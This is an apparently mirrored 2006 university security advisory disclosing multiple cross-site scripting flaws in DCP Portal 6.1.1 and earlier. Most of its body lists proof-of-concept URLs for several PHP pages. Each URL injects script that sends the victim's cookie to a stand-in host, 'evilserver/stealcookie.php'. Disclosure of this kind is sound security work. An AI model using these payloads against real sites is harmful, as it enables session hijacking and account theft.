Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11762
HistoryMar 09, 2006 - 12:00 a.m.

DCP Portal: Multiple XSS Vulnerabilities

2006-03-0900:00:00
vulners.com
44

===========================================================
DCP Portal: Multiple XSS Vulnerabilities

Technical University of Vienna Security Advisory
TUVSA-0603-001, March 9, 2006

Affected applications

DCP Portal (www.dcp-portal.com)

Versions 6.1.1 and prior.

Description

There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following
exploits (the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the
files that have to be navigated).The vulnerabilities were discovered under the assumption that
register_globals is on, and that magic_quotes_gpc is off.

index.php

calendar.php

  • 52:

http://localhost/dcp-portal611/calendar.php?subject_color="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 52:

http://localhost/dcp-portal611/calendar.php?images="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 55: like 52

  • 62:

http://localhost/dcp-portal611/calendar.php?day=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

http://localhost/dcp-portal611/calendar.php?year=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 92: analogous to lines 52 und 55 ($images)

  • 149: $_REQUEST['year'] again

  • 151: $_REQUEST['year'] again

  • between lines 199 and 219: $_REQUEST[*] again (nine times)

  • 223:
    echoing the value returned by function PrintCalendar (composes its
    return value from $_REQUEST[*])

  • 255: repeat

  • 230: $subject_color, like 52

  • 255: $_REQUEST['year']

  • 257: $_REQUEST['year']

  • 261: $_REQUEST['day']

forums.php

http://localhost/dcp-portal611/forums.php?action=board&bid="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 191:

http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1&replying_msg=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1&mid="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

inbox.php

lostpassword.php

  • 63:

http://localhost/dcp-portal611/lostpassword.php?subject_color="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 64:

http://localhost/dcp-portal611/lostpassword.php?email="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

mycontents.php

  • 88:

http://localhost/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 93:

http://localhost/dcp-portal611/mycontents.php?action=content&content_inicial=</textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 126:

http://localhost/dcp-portal611/mycontents.php?action=content&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 155:

http://localhost/dcp-portal611/mycontents.php?action=addnews&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 159:

http://localhost/dcp-portal611/mycontents.php?action=addnews&content_inicial=</textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 185:

http://localhost/dcp-portal611/mycontents.php?action=addnews&mode=write&dcp_editor_contingut_html=xyz&c_name=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>&c_image_name=

  • 218:

http://localhost/dcp-portal611/mycontents.php?action=addanns&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 222: $content_inicial again

  • 248: $c_name again

  • 315:

http://localhost/dcp-portal611/mycontents.php?action=updatecontent&cid="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 320:

http://localhost/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

  • 326: $content_inicial again

  • 362: $c_name again

  • 404: $action_submit, via $cid (analogous to 315)

  • 414: $content_inicial again

  • 444: $c_name again

search.php

Solution

The authors have not responded to our messages, so there is no solution to these issues yet.

Timeline:

February 19, 2006:
Vulnerabilities indicated via andy at codeworx dot ca, but no response.

March 9, 2006:
Advisory submission.

References

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txt

Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at